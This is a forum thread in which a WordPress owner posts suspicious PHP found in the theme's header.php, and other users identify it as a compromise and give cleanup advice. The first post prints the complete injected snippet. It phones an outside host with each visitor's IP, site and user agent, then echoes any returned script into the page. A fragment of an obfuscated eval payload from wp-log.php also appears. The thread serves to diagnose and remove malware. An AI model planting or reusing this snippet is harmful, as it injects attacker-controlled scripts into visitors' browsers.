Suspicious Wordpress Code

[trival]

i saw this code in my wordpress website. i was wondering what is this code. Because i cant remember putting this code in my site.

here it is.

<?php $wp_rssh = 'http'; $wp_gt = 'get'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_rssh."s".$wp_gt.".com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

 

[l0calh0st]

Where is this exactly located? It seems to be something from RSS/logger.

 

[trival]

its located in Header.php. i searched that code and i found that its a hacking code

check this link http://awake.ro/lightblog/forms-of-website-hacking-php.html

and i cant contact the owner of that blog. i was hoping for a solution if its really true. Coz i dnt want my site to get hacked

 

[msk19994]

if u think its a hacking code then remove it :D

 

[ibby]

remove the code. if the site and all plugins are functioning then perfect. if the site and only one plugin is not functioning then you got a problem. Or it could be because of your theme..

 

[Smith]

Your Wordpress has been compromised. header.php is not the only file someone has changed.

Check functions, and all major files. Also in wp-include check for wp-log.php, that file probably will have different date of upload because someone has added it.

 

[trival]

in wp-log.php i found this : preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\ . it really looks like i got hacked

 

[trival]

i finally removed the wp-login.php and it worked fine till i see wierd Crawl errors from webmasters tool .

like this : http://www.sample.com/MyPage/1345363990000/1345971325000

whats with the numbers? i only created MyPage. and then i saw a Crawl 404 errors in webmasters tool lots of them 300 per day

 

[Cometolearn]

always update wordpress , then u will not receive this hacking codes

 

[trival]

im always up to date. but still this happened

 

[masterb56]

If I were you, I'd do an sql backup, find another decent clean theme and just start from there. It seems that those theme files are now dirty, and most probably have infected your server/vps.

 

[desert fox]

"&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent)

looks like a shell to me check for backdoors remove any new files

 

[trival]

i already did . but i really cant tell if my site is clean

 

[Phogo]

Where did you get your theme from? Alot of "nulled" script sites release themes with nasty hidden things in. If you have a timthumb file make sure its upto date. If you like i can have a look for you.

 

[SplitIce]

its a SEO spam hack, creates fake pages with linkbacks. Ive seen it alot, most likely there are also other compromized files.

My advice, use the latest wordpress version (and versions of your plugins). And under no circumstances use nulled themes.

For one it rips of the developer, two unless you know PHP and check over them there is a good chance that you will have a shell or similar code in there somewhere.

Do a rebuild.
Keep the database and any uploaded files, although go through them looking for any .php's
And be more careful in the future.